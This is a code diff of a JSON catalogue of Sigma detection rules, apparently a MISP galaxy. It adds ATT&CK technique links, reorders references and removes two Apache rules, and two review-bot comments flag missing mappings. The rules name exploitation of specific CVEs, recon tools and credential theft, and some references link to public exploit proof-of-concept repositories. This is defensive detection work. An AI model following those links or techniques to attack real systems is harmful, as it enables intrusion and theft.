@@ -60058,6 +77511,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7745c2ea-24a5-4290-b680-04359cb84b35", "value": "Path Traversal Exploitation Attempts" }, @@ -60083,6 +77545,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "20c6ed1c-f7f0-4ea3-aa65-4f198e6acb0f", "value": "Sitecore Pre-Auth RCE CVE-2021-42237" }, @@ -60099,9 +77570,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", - "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", "https://github.com/apache/spark/pull/36315/files", + "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", + "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_33891_spark_shell_command_injection.yml" ], "tags": [ @@ -60110,6 +77581,15 @@ "cve.2022.33891" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1a9a04fd-02d1-465c-abad-d733fd409f9c", "value": "Apache Spark Shell Command Injection - Weblogs" }, 
@@ -60126,9 +77606,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", - "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", + "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", + "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_useragents.yml" ], "tags": [ @@ -60136,6 +77616,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "19aa4f58-94ca-45ff-bc34-92e533c0994a", "value": "Suspicious User-Agents Related To Recon Tools" }, @@ -60161,6 +77650,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "efdb2003-a922-48aa-8f37-8b80021a9706", "value": "CVE-2022-31659 VMware Workspace ONE Access RCE" }, 
@@ -60185,30 +77683,18 @@
 "attack.t1190"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "a2e97350-4285-43f2-a63f-d0daff291738",
 "value": "Fortinet CVE-2018-13379 Exploitation"
 },
- {
- "description": "Detects an issue in apache logs that reports threading related errors",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2019/01/22",
- "falsepositive": [
- "3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185"
- ],
- "filename": "web_apache_threading_error.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "No established product",
- "refs": [
- "https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_threading_error.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c",
- "value": "Apache Threading Error"
- },
 {
 "description": "Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs",
 "meta": {
@@ -60230,6 +77716,15 @@
 "attack.t1190"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "f425637f-891c-4191-a6c4-3bb1b70513b4",
 "value": "Fortinet CVE-2021-22123 Exploitation"
 },
@@ -60256,6 +77751,15 @@
 "attack.t1190"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "23eee45e-933b-49f9-ae1b-df706d2d52ef",
 "value": "Exchange ProxyShell Pattern"
 },
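Review bot: The first hunk here deletes the "Apache Threading Error" cluster (uuid `e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c`) outright, and the hunk around "Log4j RCE CVE-2021-44228 Generic" a little further on does the same for "Apache Segmentation Fault" (uuid `1da8ce0b-855d-4004-8860-7d64d42063b1`). Galaxy cluster uuids end up as tags on existing MISP events and as `dest-uuid` targets in other clusters' `related` lists, so dropping a published uuid can leave dangling references in deployed instances. The removals look like a side effect of the generator no longer seeing those two rule files (upstream Sigma appears to have retired them — verify), not a deliberate curation decision, and the commit message does not mention them. Consider having the generator keep removed clusters with a deprecation marker instead of deleting them, or at least call the two deleted uuids out in the commit message.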
@@ -60297,8 +77801,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/sensepost/reGeorg", "https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3", + "https://github.com/sensepost/reGeorg", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_webshell_regeorg.yml" ], "tags": [ @@ -60322,12 +77826,12 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.lunasec.io/docs/blog/log4j-zero-day/", - "https://github.com/tangxiaofeng7/apache-log4j-poc", - "https://twitter.com/shutingrz/status/1469255861394866177?s=21", "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", "https://news.ycombinator.com/item?id=29504755", + "https://github.com/tangxiaofeng7/apache-log4j-poc", "https://github.com/YfryTchsGD/Log4jAttackSurface", + "https://twitter.com/shutingrz/status/1469255861394866177?s=21", + "https://www.lunasec.io/docs/blog/log4j-zero-day/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j.yml" ], "tags": [ 
@@ -60335,33 +77839,18 @@
 "attack.t1190"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "5ea8faa8-db8b-45be-89b0-151b84c82702",
 "value": "Log4j RCE CVE-2021-44228 Generic"
 },
- {
- "description": "Detects a segmentation fault error message caused by a creashing apache worker process",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2017/02/28",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_apache_segfault.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "No established product",
- "refs": [
- "http://www.securityfocus.com/infocus/1633",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_segfault.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1499.004"
- ]
- },
- "uuid": "1da8ce0b-855d-4004-8860-7d64d42063b1",
- "value": "Apache Segmentation Fault"
- },
 {
 "description": "Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398",
 "meta": {
@@ -60383,6 +77872,15 @@
 "attack.t1190"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "e9bc39ae-978a-4e49-91ab-5bd481fc668b",
 "value": "Confluence Exploitation CVE-2019-3398"
 },
@@ -60407,6 +77905,15 @@
 "attack.t1190"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "56973b50-3382-4b56-bdf5-f51a3183797a",
 "value": "CVE-2021-33766 Exchange ProxyToken Exploitation"
 },
@@ -60424,8 +77931,8 @@ "logsource.product": "No established product", "refs": [ "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2", - "https://www.tenable.com/security/research/tra-2021-13", "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild", + "https://www.tenable.com/security/research/tra-2021-13", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml" ], "tags": [ @@ -60435,6 +77942,15 @@ "cve.2021.20091" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f0500377-bc70-425d-ac8c-e956cd906871", "value": "Arcadyan Router Exploitations" }, @@ -60461,6 +77977,15 @@ "cve.2020.28188" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "15c312b9-00d0-4feb-8870-7d940a4bdc5e", "value": "TerraMaster TOS CVE-2020-28188" }, @@ -60485,6 +78010,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5a35116f-43bc-4901-b62d-ef131f42a9af", "value": "CVE-2020-10148 SolarWinds Orion API Auth Bypass" }, 
@@ -60501,8 +78035,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server", "https://kb.vmware.com/s/article/85717", + "https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22005_vmware_file_upload.yml" ], "tags": [ @@ -60510,6 +78044,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b014ea07-8ea0-4859-b517-50a4e5b7ecec", "value": "VMware vCenter Server File Upload CVE-2021-22005" }, @@ -60526,12 +78069,12 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://nvd.nist.gov/vuln/detail/CVE-2021-41773", "https://twitter.com/bl4sty/status/1445462677824761878", + "https://twitter.com/ptswarm/status/1445376079548624899", "https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782", "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml", - "https://twitter.com/ptswarm/status/1445376079548624899", "https://twitter.com/h4x0r_dz/status/1445401960371429381", + "https://nvd.nist.gov/vuln/detail/CVE-2021-41773", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_41773_apache_path_traversal.yml" ], "tags": [ @@ -60539,6 +78082,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3007fec6-e761-4319-91af-e32e20ac43f5", "value": "CVE-2021-41773 Exploitation Attempt" }, 
@@ -60567,6 +78119,15 @@ "cve.2014.6287" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a133193c-2daa-4a29-8022-018695fcf0ae", "value": "Rejetto HTTP File Server RCE" }, @@ -60584,8 +78145,8 @@ "logsource.product": "No established product", "refs": [ "https://github.com/lijiejie/IIS_shortname_Scanner", - "https://www.exploit-db.com/exploits/19525", "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml", + "https://www.exploit-db.com/exploits/19525", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_iis_tilt_shortname_scan.yml" ], "tags": [ @@ -60593,6 +78154,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7cb02516-6d95-4ffc-8eee-162075e111ac", "value": "Successful IIS Shortname Fuzzing Scan" }, @@ -60617,6 +78187,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fcf1101d-07c9-49b2-ad81-7e421ff96d80", "value": "CVE-2022-31656 VMware Workspace ONE Access Auth Bypass" }, @@ -60633,8 +78212,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter", "https://twitter.com/aboul3la/status/1286012324722155525", + "https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml" ], "tags": [ 
@@ -60643,6 +78222,15 @@ "cve.2020.3452" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aba47adc-4847-4970-95c1-61dce62a8b29", "value": "Cisco ASA FTD Exploit CVE-2020-3452" }, @@ -60688,6 +78276,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fce2c2e2-0fb5-41ab-a14c-5391e1fd70a5", "value": "CVE-2020-0688 Exchange Exploitation via Web Log" }, @@ -60729,11 +78326,11 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://isc.sans.edu/diary/25686", - "https://support.citrix.com/article/CTX267027", "https://support.citrix.com/article/CTX267679", - "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md", + "https://support.citrix.com/article/CTX267027", + "https://isc.sans.edu/diary/25686", "https://twitter.com/mpgn_x64/status/1216787131210829826", + "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_19781_citrix_exploit.yml" ], "tags": [ @@ -60741,6 +78338,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ac5a6409-8c89-44c2-8d64-668c29a2d756", "value": "Citrix Netscaler Attack CVE-2019-19781" }, 
@@ -60765,6 +78371,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7c64e577-d72e-4c3d-9d75-8de6d1f9146a", "value": "CVE-2020-0688 Exploitation Attempt" }, @@ -60826,8 +78441,8 @@ "logsource.product": "No established product", "refs": [ "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html", - "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", "https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/", + "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml" ], "tags": [ @@ -60837,6 +78452,15 @@ "attack.t1505.003" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fcbb4a77-f368-4945-b046-4499a1da69d1", "value": "CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit" }, @@ -60862,6 +78486,15 @@ "attack.t1037.005" ] }, + "related": [ + { + "dest-uuid": "c0dfe7b0-b873-4618-9ff8-53e31f70907f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dfe8b941-4e54-4242-b674-6b613d521962", "value": "Startup Items" }, 
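Review bot: In `@@ -60837,6 +78452,15 @@` the ManageEngine rule carries `attack.t1505.003` in its tags, yet the only `related` entry added is `3f886f2a-874f-4333-b794-aa6075009b1c`, the same dest-uuid that accompanies every `attack.t1190`-tagged web rule in this diff, so the t1505.003 tag appears not to have been resolved to a technique. The same gap shows more clearly in the linux/auditd hunks from `@@ -61890,7 +79750,6 @@` onward: rules referencing T1543.002, T1123, T1027.003, T1115, T1113 and T1082 lose their attack.mitre.org link, and the unchanged region after each of those hunks shows no `related` block being added, while neighbours such as the insmod rule (`@@ -62149,6 +80019,15 @@`) and the firewall rule (`@@ -62253,6 +80139,15 @@`) do get one. If the dropped URLs are meant to be superseded by `related` mappings, these rules end up with their ATT&CK linkage only in the tag string, which downstream galaxy consumers will not follow. The generator's technique lookup for those IDs is worth checking before merge; the affected set is inferred from hunk ranges rather than from the full file.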
@@ -60878,8 +78511,8 @@ "logsource.category": "file_event", "logsource.product": "macos", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml" ], "tags": [ @@ -60888,6 +78521,15 @@ "attack.t1546.014" ] }, + "related": [ + { + "dest-uuid": "9c45eaa3-8604-4780-8988-b5074dbb9ecd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "23c43900-e732-45a4-8354-63e4a6c187ce", "value": "MacOS Emond Launch Daemon" }, @@ -60985,6 +78627,15 @@ "attack.t1059.002" ] }, + "related": [ + { + "dest-uuid": "37b11151-1776-4f8f-b328-30939fbf2ceb", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1bc2e6c5-0885-472b-bed6-be5ea8eace55", "value": "MacOS Scripting Interpreter AppleScript" }, @@ -61009,6 +78660,15 @@ "attack.t1553.001" ] }, + "related": [ + { + "dest-uuid": "31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f5141b6d-9f42-41c6-a7bf-2a780678b29b", "value": "Gatekeeper Bypass via Xattr" }, 
@@ -61049,8 +78709,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685", "https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml" ], "tags": [ @@ -61067,6 +78727,43 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "37b11151-1776-4f8f-b328-30939fbf2ceb", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "ef67e13e-5598-4adc-bdb2-998225874fa9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b83e166d-13d7-4b52-8677-dff90c548fd7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4", "value": "Suspicious Execution via macOS Script Editor" }, 
@@ -61115,6 +78812,15 @@ "attack.persistence" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "51719bf5-e4fd-4e44-8ba8-b830e7ac0731", "value": "Creation Of A Local User Account" }, @@ -61163,6 +78869,15 @@ "attack.t1564.002" ] }, + "related": [ + { + "dest-uuid": "8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b22a5b36-2431-493a-8be1-0bae56c28ef3", "value": "Hidden User Creation" }, @@ -61188,6 +78903,15 @@ "attack.t1552.003" ] }, + "related": [ + { + "dest-uuid": "8187bd2a-866f-4457-9009-86b0ddedffa3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "508a9374-ad52-4789-b568-fc358def2c65", "value": "Suspicious History File Operations" }, @@ -61212,6 +78936,15 @@ "attack.t1049" ] }, + "related": [ + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9a7a0393-2144-4626-9bf1-7c2f5a7321db", "value": "System Network Connections Discovery - MacOs" }, @@ -61252,8 +78985,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08", + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml" ], "tags": [ 
@@ -61300,8 +79033,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web", "https://www.manpagez.com/man/8/firmwarepasswd/", + "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web", "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml" ], @@ -61333,6 +79066,15 @@ "attack.t1070.006" ] }, + "related": [ + { + "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0", "value": "File Time Attribute Change" }, @@ -61362,6 +79104,29 @@ "attack.s0402" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "234dc5df-40b5-49d1-bf53-0d44ce778eca", "value": "Payload Decoded and Decrypted via Built-in Utilities" }, @@ -61410,6 +79175,15 @@ "attack.t1069.001" ] }, + "related": [ + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "89bb1f97-c7b9-40e8-b52b-7d6afbd67276", "value": "Local Groups Discovery - MacOs" }, 
@@ -61436,6 +79210,15 @@ "attack.t1053.003" ] }, + "related": [ + { + "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7c3b43d8-d794-47d2-800a-d277715aa460", "value": "Scheduled Cron Task/Job - MacOs" }, @@ -61508,6 +79291,15 @@ "attack.t1030" ] }, + "related": [ + { + "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7f2bb9d5-6395-4de5-969c-70c11fbe6b12", "value": "Split A File Into Pieces" }, @@ -61524,8 +79316,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md", + "https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml" ], "tags": [ @@ -61557,6 +79349,15 @@ "attack.t1087.001" ] }, + "related": [ + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ddf36b67-e872-4507-ab2e-46bda21b842c", "value": "Local System Accounts Discovery - MacOs" }, @@ -61606,6 +79407,15 @@ "attack.t1070.002" ] }, + "related": [ + { + "dest-uuid": "2bce5b30-7014-4a5d-ade7-12913fe6ac36", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "acf61bd8-d814-4272-81f0-a7a269aa69aa", "value": "Indicator Removal on Host - Clear Mac System Logs" }, 
@@ -61630,6 +79440,15 @@ "attack.t1529" ] }, + "related": [ + { + "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "40b1fbe2-18ea-4ee7-be47-0294285811de", "value": "System Shutdown/Reboot - MacOs" }, @@ -61679,6 +79498,15 @@ "attack.t1555.001" ] }, + "related": [ + { + "dest-uuid": "1eaebf46-e361-4437-bc23-d5d65a3b92e3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b120b587-a4c2-4b94-875d-99c9807d6955", "value": "Credentials from Password Stores - Keychain" }, @@ -61720,9 +79548,9 @@ "logsource.category": "No established category", "logsource.product": "qualys", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml" ], @@ -61742,8 +79570,8 @@ "logsource.category": "No established category", "logsource.product": "qualys", "refs": [ - 